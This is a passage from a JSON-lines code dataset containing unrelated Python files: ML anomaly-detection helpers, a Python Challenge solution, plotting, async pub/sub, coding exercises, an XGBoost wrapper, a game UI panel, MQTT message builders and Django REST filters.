return intervals\n\n def delete_single_interval(interval_list, series):\n result = []\n for interval in interval_list:\n if interval[1] - interval[0] <= 4:\n if calculate_proportion(series, interval) > 5:\n result.append(interval)\n else:\n continue\n else:\n result.append(interval)\n return result\n\n interval_list_r = []\n counts = duration_column.value_counts()\n\n i = 0\n while True:\n candidate = counts.index[i]\n minimum = candidate - 2\n maximum = candidate + 2\n interval_list_r.append([minimum, maximum])\n interval_list_r = merge_interval(interval_list_r)\n proportion = calculate_proportion_fromlist(counts, interval_list_r)\n if proportion > 99:\n break\n i += 1\n\n interval_list_r[0][0] = 0\n interval_list_r[-1][1] -= 0\n\n interval_list_r = delete_single_interval(interval_list_r, counts)\n interval_list_r = fusion_interval(interval_list_r)\n\n final_result = []\n for item in interval_list_r:\n final_result.append([item, calculate_proportion(counts, item)])\n final_result.sort(key=lambda x: x[1], reverse=True)\n print(final_result)\n\n finalfinal = []\n for item in final_result:\n if item[1] > 5:\n finalfinal.append(item[0])\n print(finalfinal)\n return finalfinal\n\n\n# noinspection PyUnresolvedReferences\ndef validate_model(company):\n pattern = re.compile(r'matrix(\\d+)machinemodule(\\d+).mat')\n sequences = []\n for root, dire, files in os.walk(company + '/matrices'):\n if len(files) > 1:\n for file in files:\n if file.endswith('.mat'):\n search = pattern.search(file)\n if search:\n sequences.append([int(search.group(1)), int(search.group(2))])\n print(sequences)\n\n higher = preprocessing.PolynomialFeatures(degree=2)\n for sequence in sequences:\n model_name = company + '/models/model' + str(sequence[0]) + 'machinemodule' + str(sequence[1]) + '.pkl'\n try:\n model = joblib.load(model_name)\n except FileNotFoundError:\n print('file not found ' + model_name)\n continue\n filename = company + '/matrices/matrix' + str(sequence[0]) + 'machinemodule' + str(sequence[1]) + '.mat'\n with open(filename, 'rb') as data:\n feature_matrix = pickle.load(data)\n learning_matrix = clean_featurematrix(feature_matrix, company)\n print(learning_matrix)\n del learning_matrix['sequenceduration']\n del learning_matrix['normal']\n learning_matrix = higher.fit_transform(model.scaler.transform(learning_matrix))\n learning_matrix = model.pca.transform(learning_matrix)\n result = model.svm.predict(learning_matrix)\n print(result)\n\n\nif __name__ == '__main__':\n #sequenceslotss = read_sequenceslot('Bucher')\n #analyse_specifique_sequence_ocsvm(sequenceslotss, 14723, 4, 'Bucher')\n #analyse_specifique_sequence_ocsvm(sequenceslotss, 14731, 4, 'Bucher')\n #analyse_specifique_sequence_ocsvm(sequenceslotss, 14732, 4, 'Bucher')\n\n #analyse_specifique_sequence_ocsvm(sequenceslotss, 14735, 4, 'Bucher')\n\n\n #analyse_all_abnormal_sequences_ocsvm('Bucher', 4)\n get_matrix_for_machinemodule('Blackmer', 4)\n\n","sub_path":"fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":37953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"92143177","text":"# -*- coding: utf-8 -*-\n\n# image練習\n# http://www.pythonchallenge.com/pc/def/oxygen.html\n\n# PIL = Python Image Library\nfrom PIL import Image\n\n\nimgOxygen = Image.open('oxygen.png')\nimgWidth, imgHeight = imgOxygen.size\n\n\n# 白黒になる高さを調べる\ny = 0\nwhile True:\n\tcol = imgOxygen.getpixel((0, y))\n\tif( col[0] == col[1] == col[2] ):\n\t\tbreak;\n\ty += 1\n\nprint('gray-scale pos(y):' + str(y))\n\n\n# 白黒のマスの横方向に見て、色が変わったら文字へ変換\nretChars = []\nx = 0\ncolOld = -1\nwhile x < imgWidth:\n\tcol = imgOxygen.getpixel((x, y))\n\tif( col[0] == col[1] == col[2] ):\n\t\t# 灰色だったら、色をchrとして変換\n\t\tretChars.append(col[0])\n\t\n\tcolOld = col[0]\n\t\n\t# 同じ色が続くこともあるので、幅分横へ動かす\n\tx += 7\n\n# 文字列を出力\nretStr = ''\nfor c in retChars:\n\t# print(chr(c))\n\tretStr += chr(c)\n\nprint(retStr)\n#smart guy, you made it. the next level is [105, 110, 116, 101, 103, 114, 105, 116, 121]\n\n\n# これをもう一度エンコードして・・・\nchars2 = [105, 110, 116, 101, 103, 114, 105, 116, 121]\nretStr = ''\nfor c in chars2:\n\tretStr += chr(c)\n\nprint(retStr)\n#integrity","sub_path":"7/img_prac.py","file_name":"img_prac.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"447872086","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author = \"Hui_Yao\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager\n\nmy_font = font_manager.FontProperties(fname = '/usr/share/fonts/YaheiConsolas/YaHeiConsolas.ttf')\n\ny_3 = [11,17,16,11,12,11,12,6,6,7,8,9,12,15,14,17,18,21,16,17,20,14,15,15,15,19,21,22,22,22,23]\ny_10 = [26,26,28,19,21,17,16,19,18,20,20,19,22,23,17,20,21,20,22,15,11,15,5,13,17,10,11,13,12,13,6]\n\nx_3 = range(1,32)\nx_10 = range(51,82)\nx_ = list(x_3) + list(x_10) #只能有一个x轴的数据\n\nx_labels = ['3月{}号'.format(i) for i in x_3]\nx_labels += ['10月{}号'.format(i-52) for i in x_10] #也只能有一个x轴标签\n\nplt.figure(figsize=(20,8),dpi = 100)\n\nplt.xticks(x_[::3],x_labels[::3],fontproperties = my_font,rotation = 45)\n\nplt.xlabel('时间',fontproperties = my_font)\nplt.ylabel('温度',fontproperties = my_font)\nplt.title('时间与温度的关系',fontproperties = my_font)\n\nplt.scatter(x_3,y_3,label = '3月份')\nplt.scatter(x_10,y_10,label = '10月份')\n\nplt.legend(loc = 'upper left' , prop = my_font)\n\nplt.show()\n\n\n\n\n\n\n","sub_path":"python_note/03_matplotlib/01_matplotlib/02_绘制散点图.py","file_name":"02_绘制散点图.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"503358879","text":"\"\"\"Async pubsub implementation.\"\"\"\n\nimport asyncio\nimport logging\nimport random\nfrom asyncio import CancelledError\nfrom typing import Any, Optional\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Channel:\n \"\"\"A channel to which you can subscribe.\"\"\"\n\n def __init__(self, name: str = \"a channel\"):\n self.subscriptions: set = set()\n self.name = name\n self._last = None\n\n def publish(self, message: Any):\n \"\"\"Publish a message on this channel.\"\"\"\n self._last = message\n for queue in self.subscriptions:\n queue.put_nowait(message)\n\n def get_latest(self):\n \"\"\"Return the last message that was put in the queue.\"\"\"\n return self._last\n\n def get_subscription(self) -> \"Subscription\":\n \"\"\"Return a subscription object.\n\n Used internally but also useful to create custom subscriber methods.\n \"\"\"\n subscription = Subscription(self)\n self.subscriptions.add(subscription.queue)\n LOGGER.debug(\n \"Subscribing to %s. Total subscribers: %s\",\n self.name,\n len(self.subscriptions),\n )\n return subscription\n\n def subscribe(self, callback) -> \"Subscription\":\n \"\"\"Subscribe to this channel\"\"\"\n _loop = asyncio.get_running_loop()\n subscription = self.get_subscription()\n subscription.task = _loop.create_task(self._subscribe(subscription, callback))\n return subscription\n\n async def _subscribe(self, subscription: \"Subscription\", callback):\n try:\n with subscription as queue:\n while True:\n msg = await queue.get()\n callback(msg)\n queue.task_done()\n except CancelledError:\n LOGGER.debug(\"Shutting down subscriber\")\n\n\nclass Subscription:\n \"\"\"Subscription class.\n Used to subscribe to a Channel.\"\"\"\n\n def __init__(self, hub: \"Channel\"):\n self.hub = hub\n self.queue = asyncio.Queue()\n self.task: Optional[asyncio.Task] = None\n\n def cancel(self):\n \"\"\"Cancel the subscription. The same as unsubscribe\"\"\"\n self.unsubscribe()\n\n def unsubscribe(self):\n \"\"\"Unsubscribe the subscription.\"\"\"\n if self.task is not None:\n self.task.cancel()\n self._remove_subscription()\n\n def _remove_subscription(self):\n if self.queue in self.hub.subscriptions:\n self.hub.subscriptions.remove(self.queue)\n LOGGER.debug(\n \"Un-subscribing from channel: %s, subscriber count: %s\",\n self.hub.name,\n len(self.hub.subscriptions),\n )\n\n def __enter__(self):\n self.hub.subscriptions.add(self.queue)\n LOGGER.debug(\n \"Subscription: %s, total subscriptions %i\",\n self.hub.name,\n len(self.hub.subscriptions),\n )\n return self.queue\n\n def __exit__(self, _type, value, traceback):\n self._remove_subscription()\n\n\nasync def reader(name, hub):\n \"\"\"An example reader\"\"\"\n msg = \"\"\n with Subscription(hub) as queue:\n while msg != \"SHUTDOWN\":\n msg = await queue.get()\n print(f\"Reader {name} got message: {msg}\")\n\n if random.random() < 0.1:\n print(f\"Reader {name} has read enough\")\n break\n\n print(f\"Reader {name} is shutting down\")\n","sub_path":"aiosubpub/aiosubpub.py","file_name":"aiosubpub.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"425992065","text":"\"\"\"\n// Time Complexity : O(n)\n// Space Complexity : O(1)\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : Trying to come with intuitve soln of\nnegative indexing\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nIterate till i < nums1 length and j < nums2 length\nBF:\nif nums2 ele is greater than num1 ele, then move nums1 pointer\nelse:\n shift the elements in nums1 by 1 from m-1th position\n increment m by 1\n replace nums1 ele with nums2 ele\n iterate nums2 pointer\nIf there are elements in nums2, place them beginning 0 in nums1\nOptimal - eliminating the shifting part, using the merge sort logic\nConfiguration - i = m -1, j = n-1, target = m + n - 1\n1. Use a target pointer to update the nums1 from num1 array and nums2 array\nbased on the greater element, since we are trying to place elements in order\n2. If there are elements in nums2, place them from target position till all \nthe elements in nums2 are placed in nums1\n\"\"\"\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n\n #Brute Force solution\n i,j = 0,0\n print(nums1,nums2)\n if nums2: #if nums2 is empty we don't do anything\n while i < m and j < n:\n if nums2[j] > nums1[i]:\n i+=1\n else:\n #shift the elements in nums1 by one till the end of the array\n k = m - 1\n m+=1 #incrementing m since we are updating the list by one element from nums2\n #Shifting the elements in nums2 starting from current m-1 index\n while k >=i:\n nums1[k+1] = nums1[k]\n k-=1\n #At this moment we just replace the nums1[i] by nums2[j]\n nums1[i] = nums2[j]\n j+=1\n while j < n:\n nums1[i] = nums2[j]\n i+=1\n j+=1\n \n \n i,j,target = m-1,n-1,m+n-1\n #PLacing the elements in order using target pointer (similar to merge sort, just here we go from behind)\n if nums2:\n while i >=0 and j >=0:\n if nums1[i] > nums2[j]:\n nums1[target] = nums1[i]\n i-=1\n else:\n nums1[target] = nums2[j]\n j-=1\n target-=1\n\n #checking the remaining elements of the nums2, need to move these elements in nums1 iteratively from ith pointer of nums1 to m+n-1\n while j >=0:\n nums1[target] = nums2[j]\n j-=1\n target-=1\n","sub_path":"merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"336246944","text":"import os\nimport subprocess\nimport sys\n\nimport pytest\n\n\n@pytest.mark.cli\n@pytest.mark.help\ndef test_help():\n output = subprocess.check_output(\n [sys.executable, '-m', 'pipenv.help'],\n stderr=subprocess.STDOUT, env=os.environ.copy(),\n )\n assert output\n\n\n@pytest.mark.cli\n@pytest.mark.help\ndef test_count_of_description_pre_option():\n test_command = 'pipenv install --help'\n test_line = '--pre Allow pre-releases.'\n out = subprocess.Popen(test_command.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout, _ = out.communicate()\n lines = stdout.decode().split('\\n')\n count = 0\n for line in lines:\n if line.strip().split() == test_line.split():\n count += 1\n assert count == 1\n","sub_path":"tests/unit/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"503347239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 7 20:33:27 2017\n\n@author: ksripinyo\n\"\"\"\n\n\n# User inputted variables here\nannual_salary = float(input('What is your starting annual salary? '))\nsemi_annual_raise = float(input('What % is your semi-annual raise? '))\nportion_saved = float(input('What portion of your salary will you save each month (decimal form)? '))\ntotal_cost = float(input('What is the total cost of your dream home? '))\n\n#fixed variables here\nportion_down_payment = float(0.25) #defined by professor\ncurrent_savings = float(total_cost*portion_down_payment)\nr = float(0.04) #The annual return rate on savings.\nmonths = int(0) #set a variable for number of months\nsemi_annual_raise=semi_annual_raise/100\n\nwhile months < 37:\n current_savings = round(current_savings + current_savings*(r/12) + (annual_salary/12)*portion_saved,2)\n print ('Savings at month',months,'=',current_savings)\n months = months +1\n if (months/6.).is_integer():\n annual_salary=round(annual_salary*(1+semi_annual_raise),2)\n print ('\\nNew salary after raise=',annual_salary)\n \nprint ('Total savings at',months,'months is',current_savings,'.')\n ","sub_path":"Problem Sets/ps1/ps1b2.py","file_name":"ps1b2.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"455563897","text":"# coding=utf-8\n\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\n\n\nclass MyXgbClassifier:\n def __init__(self, params,\n num_boost_round=2000,\n early_stopping_rounds=25,\n verbose_eval=25,\n test_size=.2,\n random_state=2017):\n self.params = params\n self.model = None\n self.num_boost_round = num_boost_round\n self.esr = early_stopping_rounds\n self.verbose_eval = verbose_eval\n self.test_size = test_size\n self.random_state = random_state\n\n def fit(self, X_train, y_train, X_val=None, y_val=None):\n\n X_train, X_val, y_train, y_val = train_test_split(\n X_train, y_train, test_size=self.test_size,\n random_state=self.random_state\n )\n dtrain = xgb.DMatrix(X_train, y_train)\n dval = xgb.DMatrix(X_val, y_val)\n\n partial_model = xgb.train(self.params, dtrain, evals=[(dval, 'val')],\n num_boost_round=self.num_boost_round,\n early_stopping_rounds=self.esr,\n verbose_eval=self.verbose_eval)\n num_boost_round = partial_model.best_iteration\n\n self.model = xgb.train(self.params, dtrain,\n num_boost_round=num_boost_round)\n\n def predict(self, X_test):\n if self.model is None:\n return None\n dtest = xgb.DMatrix(X_test)\n return self.model.predict(dtest)\n","sub_path":"my_py_models/my_xgb_classifier.py","file_name":"my_xgb_classifier.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"606513558","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\r\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/battle/legacy/damage_panel.py\r\nimport math\r\nimport BigWorld\r\nimport GUI\r\nimport Math\r\nfrom constants import ATTACK_REASON_INDICES\r\nfrom debug_utils import LOG_DEBUG\r\nfrom gui.Scaleform.daapi.view.battle.legacy import DAMAGE_PANEL_PATH, TANK_INDICATOR_PANEL_PATH\r\nfrom gui.Scaleform.daapi.view.battle.legacy.meta.DamagePanelMeta import DamagePanelMeta\r\nfrom gui.Scaleform.locale.FALLOUT import FALLOUT\r\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\r\nfrom gui.battle_control import g_sessionProvider, vehicle_getter\r\nfrom gui.battle_control.arena_info.interfaces import IArenaVehiclesController\r\nfrom gui.battle_control.battle_constants import VEHICLE_VIEW_STATE\r\n_STATE_HANDLERS = {VEHICLE_VIEW_STATE.HEALTH: 'as_updateHealthS',\r\n VEHICLE_VIEW_STATE.SPEED: 'as_updateSpeedS',\r\n VEHICLE_VIEW_STATE.CRUISE_MODE: 'as_setCruiseModeS',\r\n VEHICLE_VIEW_STATE.FIRE: 'as_setFireInVehicleS',\r\n VEHICLE_VIEW_STATE.AUTO_ROTATION: 'as_setAutoRotationS',\r\n VEHICLE_VIEW_STATE.DESTROYED: '_updateDestroyed',\r\n VEHICLE_VIEW_STATE.CREW_DEACTIVATED: '_updateCrewDeactivated',\r\n VEHICLE_VIEW_STATE.PLAYER_INFO: '_updatePlayerInfo',\r\n VEHICLE_VIEW_STATE.DEVICES: '_updateDeviceState',\r\n VEHICLE_VIEW_STATE.REPAIRING: '_updateRepairingDevice',\r\n VEHICLE_VIEW_STATE.SWITCHING: '_switching',\r\n VEHICLE_VIEW_STATE.RPM: 'as_setNormalizedEngineRpmS',\r\n VEHICLE_VIEW_STATE.MAX_SPEED: 'as_updateMaxSpeedS',\r\n VEHICLE_VIEW_STATE.VEHICLE_MOVEMENT_STATE: '_updateVehicleMovementState',\r\n VEHICLE_VIEW_STATE.VEHICLE_ENGINE_STATE: '_updateVehicleEngineState'}\r\n\r\nclass _TankIndicatorCtrl(object):\r\n \"\"\"\r\n Tank Indicator flash GUI component.\r\n \"\"\"\r\n\r\n def __init__(self, ui):\r\n mc = GUI.WGTankIndicatorFlash(ui.movie, TANK_INDICATOR_PANEL_PATH)\r\n mc.wg_inputKeyMode = 2\r\n ui.component.addChild(mc, 'tankIndicator')\r\n\r\n def __del__(self):\r\n LOG_DEBUG('_TankIndicatorCtrl deleted')\r\n\r\n def clear(self, ui):\r\n setattr(ui.component, 'tankIndicator', None)\r\n return\r\n\r\n def setup(self, ui, vehicle, yawLimits):\r\n \"\"\"\r\n Setups current properties of vehicle.\r\n \r\n :param ui: instance of parent UI.\r\n :param vehicle: entity of vehicle.\r\n :param yawLimits: tuple(left angle, right angle) containing yaw limit in degrees.\r\n \"\"\"\r\n if vehicle.isPlayerVehicle:\r\n hullMat = BigWorld.player().getOwnVehicleMatrix()\r\n else:\r\n hullMat = vehicle.matrix\r\n turretMat = vehicle.appearance.turretMatrix\r\n tankIndicator = ui.component.tankIndicator\r\n if yawLimits:\r\n tankIndicator.wg_turretYawConstraints = yawLimits\r\n else:\r\n tankIndicator.wg_turretYawConstraints = Math.Vector2(0.0, 0.0)\r\n tankIndicator.wg_hullMatProv = hullMat\r\n tankIndicator.wg_turretMatProv = turretMat\r\n\r\n\r\nclass DamagePanel(DamagePanelMeta, IArenaVehiclesController):\r\n \"\"\"\r\n The panel that displays current properties of vehicle:\r\n - name of player and type of tank;\r\n - crew, devices;\r\n - tank indicator by type: SPG, AT-SPG, Tank. For vehicles that have yaw limit (for SPG, AT-SPG)\r\n - angle constraints for turret.\r\n - speed of vehicle;\r\n - tachometer;\r\n - current and maximum health of vehicle;\r\n - current mode for cruise control. Only for player's vehicle;\r\n - indicators of damage to crew. Only for player's vehicle;\r\n - indicators of damage to device. Only for player's vehicle;\r\n - auto rotation. Only for player's vehicle;\r\n - fire. Only for player's vehicle.\r\n \"\"\"\r\n\r\n def __init__(self, parentUI):\r\n super(DamagePanel, self).__init__()\r\n self.__ui = parentUI\r\n self.__tankIndicator = None\r\n self.__isShow = True\r\n self.__isHasGasAttack = False\r\n self.__vehicleID = None\r\n return\r\n\r\n def __del__(self):\r\n LOG_DEBUG('DamagePanel deleted')\r\n\r\n def start(self):\r\n \"\"\"\r\n Routine invokes when battle interface is created - player joined to arena.\r\n \"\"\"\r\n self.__isHasGasAttack = g_sessionProvider.arenaVisitor.hasGasAttack()\r\n if self._populate(self.__ui.getMember(DAMAGE_PANEL_PATH)):\r\n self.__tankIndicator = _TankIndicatorCtrl(self.__ui)\r\n ctrl = g_sessionProvider.shared.vehicleState\r\n if ctrl is not None:\r\n ctrl.onVehicleControlling += self.__onVehicleControlling\r\n ctrl.onVehicleStateUpdated += self.__onVehicleStateUpdated\r\n g_sessionProvider.addArenaCtrl(self)\r\n vehicle = ctrl.getControllingVehicle()\r\n if vehicle:\r\n self.__vehicleID = vehicle.id\r\n self._updatePlayerInfo(vehicle.id)\r\n self.__onVehicleControlling(vehicle)\r\n return\r\n\r\n def destroy(self):\r\n \"\"\"\r\n Routine invokes when player leave arena.\r\n \"\"\"\r\n ctrl = g_sessionProvider.shared.vehicleState\r\n if ctrl is not None:\r\n ctrl.onVehicleControlling -= self.__onVehicleControlling\r\n ctrl.onVehicleStateUpdated -= self.__onVehicleStateUpdated\r\n g_sessionProvider.removeArenaCtrl(self)\r\n if self._flashObject:\r\n self.as_destroyS()\r\n self._dispose()\r\n if self.__tankIndicator:\r\n self.__tankIndicator.clear(self.__ui)\r\n self.__tankIndicator = None\r\n self.__ui = None\r\n self.__isShow = False\r\n self.__isHasGasAttack = False\r\n return\r\n\r\n def showAll(self, isShow):\r\n \"\"\"\r\n Hides damage panel component if camera mode equals video.\r\n \r\n :param isShow: True if damage panel component should be visible, otherwise false.\r\n \"\"\"\r\n if self.__isShow != isShow:\r\n self.__isShow = isShow\r\n self.as_showS(isShow)\r\n\r\n def clickToTankmanIcon(self, entityName):\r\n self.__changeVehicleSetting('medkit', entityName)\r\n\r\n def clickToDeviceIcon(self, entityName):\r\n self.__changeVehicleSetting('repairkit', entityName)\r\n\r\n def clickToFireIcon(self):\r\n self.__changeVehicleSetting('extinguisher', None)\r\n return\r\n\r\n def updateVehiclesInfo(self, updated, arenaDP):\r\n for flags, vo in updated:\r\n if vo.vehicleID == self.__vehicleID:\r\n self._updatePlayerInfo(self.__vehicleID)\r\n break\r\n\r\n def _updatePlayerInfo(self, value):\r\n \"\"\"\r\n Updates player information on panel.\r\n \r\n :param value: ID of vehicle.\r\n \"\"\"\r\n result = g_sessionProvider.getCtx().getPlayerFullNameParts(vID=value, showVehShortName=False)\r\n self.as_setPlayerInfoS(result.playerFullName, result.playerName, result.clanAbbrev, result.regionCode, result.vehicleName)\r\n\r\n def _updateDeviceState(self, value):\r\n \"\"\"\r\n Updates indicators of damage to crew/devices .\r\n \r\n :param value: name of entity.\r\n :return: (deviceName, deviceState, realState).\r\n \"\"\"\r\n LOG_DEBUG('updateDeviceState', value)\r\n self.as_updateDeviceStateS(*value[:2])\r\n\r\n def _updateRepairingDevice(self, value):\r\n \"\"\"\r\n Updates current module repair status bar. It's called from Avatar.updateVehicleMiscStatus.\r\n \r\n :param value: (deviceName, progress, seconds) where are\r\n - deviceName, string value of device name;\r\n - progress, integer containing current progress of repair (percent);\r\n - seconds, integer containing time left to repair module.\r\n \"\"\"\r\n self.as_updateRepairingDeviceS(*value)\r\n\r\n def _updateCrewDeactivated(self, deathReasonID):\r\n self.as_setCrewDeactivatedS()\r\n\r\n def _updateDestroyed(self, deathReasonID=None):\r\n if self.__isHasGasAttack and deathReasonID is not None:\r\n if deathReasonID == ATTACK_REASON_INDICES['gas_attack']:\r\n self.__ui.movie.falloutItems.as_setPostmortemGasAtackInfo({'imgPath': RES_ICONS.MAPS_ICONS_BATTLE_ICON_BATTLE_DEAD,\r\n 'infoStr': FALLOUT.GASATTACK_POSTMORTEM_VEHICLEDESTROYED,\r\n 'respawnInfo': FALLOUT.GASATTACK_POSTMORTEM_RESPAWNINFO})\r\n else:\r\n self.__ui.movie.falloutItems.as_setPostmortemGasAtackInfo({'infoStr': FALLOUT.GASATTACK_POSTMORTEM_VEHICLEDESTROYED,\r\n 'respawnInfo': FALLOUT.GASATTACK_POSTMORTEM_RESPAWNINFO})\r\n self.as_setVehicleDestroyedS()\r\n return\r\n\r\n def _updateVehicleMovementState(self, runAnimation):\r\n if runAnimation:\r\n self.as_startVehicleStartAnimS()\r\n else:\r\n self.as_finishVehicleStartAnimS()\r\n\r\n def _updateVehicleEngineState(self, runAnimation):\r\n if runAnimation:\r\n self.as_playEngineStartAnimS()\r\n else:\r\n self.as_finishVehicleStartAnimS()\r\n\r\n def _switching(self, _):\r\n self.as_resetS()\r\n if self.__isHasGasAttack:\r\n self.__ui.movie.falloutItems.as_hidePostmortemGasAtackInfo()\r\n\r\n def __changeVehicleSetting(self, tag, entityName):\r\n ctrl = g_sessionProvider.shared.equipments\r\n if ctrl is None:\r\n return\r\n else:\r\n result, error = ctrl.changeSettingByTag(tag, entityName=entityName, avatar=BigWorld.player())\r\n if not result and error:\r\n ctrl = g_sessionProvider.shared.messages\r\n if ctrl is not None:\r\n ctrl.onShowVehicleErrorByKey(error.key, error.ctx)\r\n return\r\n\r\n def __onVehicleControlling(self, vehicle):\r\n self.__vehicleID = vehicle.id\r\n vTypeDesc = vehicle.typeDescriptor\r\n vType = vTypeDesc.type\r\n yawLimits = vehicle_getter.getYawLimits(vTypeDesc)\r\n if yawLimits:\r\n inDegrees = (math.degrees(-yawLimits[0]), math.degrees(yawLimits[1]))\r\n else:\r\n inDegrees = None\r\n if vehicle.isPlayerVehicle:\r\n isAutoRotationOn = vehicle_getter.isAutoRotationOn(vTypeDesc)\r\n else:\r\n isAutoRotationOn = None\r\n self.as_setupS((vTypeDesc.maxHealth, vehicle.health), vehicle_getter.getVehicleIndicatorType(vTypeDesc), vehicle_getter.getCrewMainRolesWoIndexes(vType.crewRoles), inDegrees, vehicle_getter.hasTurretRotator(vTypeDesc), isAutoRotationOn)\r\n if self.__tankIndicator:\r\n self.__tankIndicator.setup(self.__ui, vehicle, yawLimits)\r\n return\r\n\r\n def __onVehicleStateUpdated(self, state, value):\r\n if state not in _STATE_HANDLERS:\r\n return\r\n else:\r\n handler = getattr(self, _STATE_HANDLERS[state], None)\r\n if handler and callable(handler):\r\n if value is not None:\r\n handler(value)\r\n else:\r\n handler()\r\n return\r\n","sub_path":"res/scripts/client/gui/Scaleform/daapi/view/battle/legacy/damage_panel.py","file_name":"damage_panel.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"93947854","text":"import re\n\n# Define a movie object\nclass Movie(object):\n\t\n\t# Base url for poster images\n\tBASE_URL_IMAGE = \"http://image.tmdb.org/t/p/original/\"\n\t# Base url for trailers\n\tBASE_URL_VIDEO = \"https://youtu.be/\"\n\n\t# Initializes a movie object\n\tdef __init__(self, title, overview, release, poster, trailer):\n\t\tself.title = re.sub(r':(.*)','',title)\n\t\tself.overview = overview\n\t\tself.release = release\n\t\tself.poster_image_url = Movie.BASE_URL_IMAGE + poster\n\t\tself.trailer_youtube_url = Movie.BASE_URL_VIDEO + trailer\t\n\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"528032131","text":"# -*- coding: utf-8 -*-\n'''\nCopyright (c) 2017 ntels Co., LTD.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCreated on 2017. Feb. 20.\n\n@author: asurada\n'''\nimport json\nfrom datetime import datetime\nfrom collections import OrderedDict\nimport string\nimport random\n\nclass JSONEncoder(json.JSONEncoder):\n # @override\n def default(self, obj):\n if isinstance(obj, datetime):\n return obj.isoformat() + 'Z'\n elif hasattr(obj, '__getstate__'):\n return obj.__getstate__()\n else:\n return json.JSONEncoder.default(self, obj)\n\nclass MQTTModel:\n def __init__(self, deviceID=None, deviceKey=None):\n self.deviceID = deviceID\n self.deviceKey = deviceKey\n\n def setDeviceReqCmdModelJson(self, requestValue=None):\n dic = OrderedDict()\n dic[\"message_type\"] = \"device.cmd\"\n dic[\"device_key\"] = self.deviceKey\n dic[\"command_id\"] = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(24))\n dic[\"request_value\"] = requestValue\n return json.dumps(dic, sort_keys=False, ensure_ascii=False)\n\n def setNodeReqCmdModelJson(self, requestValue=None, nodeID=None):\n dic = OrderedDict()\n dic[\"message_type\"] = \"node.cmd\"\n dic[\"device_key\"] = self.deviceKey\n dic[\"node_id\"] = nodeID\n dic[\"command_id\"] = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(24))\n dic[\"request_value\"] = requestValue\n return json.dumps(dic, sort_keys=False, ensure_ascii=False)\n\n","sub_path":"AoT/util/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"174840971","text":"from rest_framework_chain import ChainedFilterSet, RelatedFilter, AllLookupsFilter\n\nfrom .models import Shipment, ShipmentLineItem\nfrom apps.products.filters import SkuFilter\nfrom apps.purchasing.filters import PurchaseOrderFilter\nfrom apps.vauth.filters import UserFilter\n\n\nclass ShipmentFilter(ChainedFilterSet):\n \"\"\"\n filter for `receiving.Shipment` model\n \"\"\"\n\n received_by = RelatedFilter(UserFilter, name='received_by')\n purchase_order = RelatedFilter(PurchaseOrderFilter, name='purchase_order')\n id = AllLookupsFilter(name='id')\n\n class Meta:\n model = Shipment\n fields = ('received_by', 'purchase_order', 'id',)\n\n\nclass ShipmentLineItemFilter(ChainedFilterSet):\n \"\"\"\n filter for `receiving.ShipmentLineItem` model\n \"\"\"\n\n shipment = RelatedFilter(ShipmentFilter, name='shipment')\n sku = RelatedFilter(SkuFilter, name='sku')\n quantity = AllLookupsFilter(name='quantity')\n id = AllLookupsFilter(name='id')\n\n class Meta:\n model = ShipmentLineItem\n fields = ('shipment', 'sku', 'quantity', 'id',)\n","sub_path":"apps/receiving/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290655921","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n\na2 + b2 = c2\nFor example, 3^2 + 4^2 = 5^2\n 9 + 16 = 25 \n\nThere exists exactly one 